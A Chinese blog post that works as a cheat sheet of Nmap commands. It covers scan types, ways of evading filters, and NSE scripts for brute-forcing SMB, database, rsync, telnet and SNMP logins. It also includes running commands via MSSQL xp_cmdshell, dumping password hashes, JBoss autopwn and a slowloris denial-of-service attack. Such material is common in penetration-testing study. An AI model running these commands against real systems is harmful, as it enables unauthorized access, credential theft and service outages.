Nmap

逼格高实用性强的神器Nmap的常用命令参数总结。

 

nmap -sTV -p- -PN 192.168.1.101[-110]    TCP扫描,跳过主机发现扫描所有端口

 

-s   

    T    扫描开放的TCP端口(TCP connect方式,之后Reset掉)

    S    扫描开放的TCP端口(TCP SYN方式,nmap的默认扫描模式,完成TCP的3次握手的前两步就RST掉,好处是很少有系统把这记入系统日志,Linux下需要root权限)

    A    扫描开放的TCP端口(TCP ACK方式,可用来探测是否有防火墙或IPS,且不会被记录)

    U    扫描开放的UDP端口,如果没有接收到端口不可达的ICMP reply,则认为是open|filtered

    V    服务、版本探测,V可加在以上各个s参数后,如-sTV

    P    扫描网段内存活主机(ICMP方式),192.168.1.*

 

-O    用来识别操作系统

-A    综合扫描,-sTV + traceroute + –O

-p-    扫描所有端口,而不是默认的常用端口

-p0-65535    指定扫描端口

-PN    跳过主机发现阶段

-iL    指定提供IP地址的文件

-n    不进行逆向DNS解析

 

-T    0~5,0表示最慢的扫描速度,而5表示最快。当为了避免被检测到而需要降低扫描速度,扫描速度越快结果越不准确

-scan_delay 5ms    设置探测时间间隔(对于对提交处理能力差的目标主机应用)

--host-timeout 5m    设置超时时间,防止扫描过慢

 

 

nmap -sX 192.168.1.101[-110]    Xmas Tree扫描

nmap -sN 192.168.1.101[-110]    Null扫描

TCP的RFC文档建议,如果一个关闭的端口收到的数据包没有置位SYN、ACK或RST标记,该端口就会发送RST数据包作为响应。此外,如果开启的端口接收的数据包中没有将SYN、ACK或RST标志置位,那么该端口会忽略这些数据包。

 

由Xmas Tree扫描创建的数据包的FIN、PSH和URG标记置为“on”。

Null扫描使用没有任何标记(全空)的数据包。

Xmas Tree扫描和Null扫描的好处是:某些情况下它们可以绕过简单的过滤器和ACL。一些低级的过滤器可以阻止SYN数据包的入侵。这种类型过滤器的目的就是阻止SYN数据包进入到系统中,进而阻止三次握手的完成。如果没有完成三次握手,系统之间就不会有TCP的信息流,外部的TCP信息流都被过滤掉了。

Xmas Tree扫描和Null扫描都不会建立任何类型的通信通道。扫描的目标就是判断目标计算机的端口是开放的还是关闭的。

Xmas Tree扫描和Null扫描针对的是 运行UNIX和Linux操作系统 并完全遵循RFC文档建议 的计算机。

 

 

----------------------------------------------------------------------------------------

收集一些实例,暂时还没怎么用到,留待以后研究:

nmap -d -sC 192.168.137.2   -d或者-d2参数开启debug模式,详细看整个扫描过程

nmap -sL 192.168.137.*    仅列出指定网络上的每台主机,不发送任何报文到目标主机

 

脚本:

nmap --script=auth 192.168.137.*  负责处理鉴权证书(绕开鉴权)的脚本,可以作为检测一下弱口令用
nmap -sC 192.168.137.*   或者nmap --script=default 192.168.137.*  默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

nmap --script=brute 192.168.137.*   提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解

nmap --script=vuln 192.168.137.*    检查是否存在常见漏洞

nmap -n -p445 --script=broadcast 192.168.137.4  在局域网内探查更多服务开启状况

nmap --script=mysql-* 192.168.137.4  支持同一应用的所有脚本扫描

nmap --script external 202.103.243.110 利用第三方的数据库或资源,例如进行whois解析

 

vnc扫描:
nmap  --script=realvnc-auth-bypass 192.168.137.4  检查vnc bypass
nmap  --script=vnc-auth  192.168.137.4     检查认证类型  01就是不用密码认证 02是需要密码才能登陆
nmap  --script=vnc-info  192.168.137.4

smb扫描:
nmap  --script=smb-brute.nse 192.168.137.4   smb破解
nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4   smb字典破解
nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4    smb已知几个严重漏洞的扫描
nmap -p 445 -n --script smb-psexec --script-args smbuser=test,smbpass=test 192.168.137.4   查询主机一些敏感信息    注:需要下载nmap_service
nmap -p 445  --script smb-ls --script-args 'share=e$,path=\,smbuser=test,smbpass=test' 192.168.137.4  查看共享目录
nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4  查看会话
nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4   系统信息


mssql:
nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=sa 192.168.137.4    列出表名
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4  xp_cmdshell执行命令
nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4    dumphash
nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4    猜解密码

mysql:
nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4   扫描root空口令
nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4  列出所有mysql用户
nmap --script=mysql-* 192.168.137.4  支持同一应用的所有脚本扫描
 

oracle:
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5  oracle弱口令破解
nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5   oracle sid扫描

 

其他:
nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync
nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解
nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解
nmap -sU --script snmp-brute 192.168.137.4            snmp破解
nmap -sV --script=telnet-brute 192.168.137.4          telnet破解
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn
nmap --script=http-methods.nse 192.168.137.4 检查http方法
nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections
nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

 

不靠谱的脚本:
vnc-brute    次数多了会禁止连接
pcanywhere-brute   次数多了会禁止连接

posted @ 2014-10-14 23:45  BT_lulu  阅读(1777)  评论(0编辑  收藏  举报